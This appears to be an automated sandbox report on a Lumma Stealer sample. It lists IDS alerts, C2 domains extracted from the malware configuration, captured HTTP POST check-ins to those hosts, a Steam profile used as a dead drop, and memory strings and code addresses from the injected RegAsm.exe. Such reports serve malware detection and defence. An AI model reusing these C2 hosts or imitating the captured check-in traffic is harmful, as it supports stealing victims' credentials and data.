    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58447 -> 104.21.77.130:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58446 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58446 -> 188.114.96.3:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: reinforcenh.shop
    Source: Malware configuration extractorURLs: offensivedzvju.shop
    Source: Malware configuration extractorURLs: fragnantbui.shop
    Source: Malware configuration extractorURLs: lootebarrkeyn.shop
    Source: Malware configuration extractorURLs: stogeneratmns.shop
    Source: Malware configuration extractorURLs: ghostreedmnu.shop
    Source: Malware configuration extractorURLs: drawzhotdog.shop
    Source: Malware configuration extractorURLs: vozmeatillu.shop
    Source: Malware configuration extractorURLs: gutterydhowi.shop
    Source: Joe Sandbox ViewIP Address: 104.21.77.130 104.21.77.130
    Source: Joe Sandbox ViewIP Address: 104.21.4.136 104.21.4.136
    Source: Joe Sandbox ViewIP Address: 172.67.189.2 172.67.189.2
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: performenj.shop
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: LRPC-e9c77b0923665da6f1.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: lootebarrkeyn.shop
    Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
    Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
    Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
    Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
    Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
    Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
    Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
    Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: performenj.shop
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/G
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/apiG
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://performenj.shop/vo
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/api2
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/K
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/x
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stogeneratmns.shop/apiD
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/Y
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 58443 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58440 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58447
    Source: unknownNetwork traffic detected: HTTP traffic on port 58445 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58446 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58446
    Source: unknownNetwork traffic detected: HTTP traffic on port 58441 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58444 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58449
    Source: unknownNetwork traffic detected: HTTP traffic on port 58442 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58448
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58448 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58442
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58445
    Source: unknownNetwork traffic detected: HTTP traffic on port 58447 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58444
    Source: unknownNetwork traffic detected: HTTP traffic on port 58449 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58441
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58440
    Source: unknownHTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:58440 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58441 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58442 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58443 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:58444 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58445 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58446 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.4:58447 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:58448 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.4:58449 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00439000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00439000

    System Summary

    barindex
    .NET source code contains very large array initializations
    Source: a7HdB2dU5P.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 364544
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004104802_2_00410480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004476002_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FEBC2_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0044004B2_2_0044004B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004010002_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0044B0202_2_0044B020
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004450E02_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004340F52_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004091F02_2_004091F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004012A72_2_004012A7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042A3452_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0044B3002_2_0044B300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A3C02_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C3902_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004493902_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004074702_2_00407470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B4702_2_0040B470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E4702_2_0040E470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004054002_2_00405400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004114202_2_00411420
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D56C2_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D58E2_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004376202_2_00437620
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004097372_2_00409737
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004037902_2_00403790
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004327B02_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042C8912_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004499702_2_00449970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409A022_2_00409A02
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00445AD02_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00449B602_2_00449B60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042BB002_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00427B0F2_2_00427B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00438C002_2_00438C00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043FD0E2_2_0043FD0E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00449E602_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407E702_2_00407E70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00447EDE2_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DEF82_2_0042DEF8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043EF502_2_0043EF50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AFD02_2_0040AFD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DFE02_2_0042DFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF802_2_0040BF80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00448F802_2_00448F80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CAD0 appears 52 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040ED80 appears 194 times
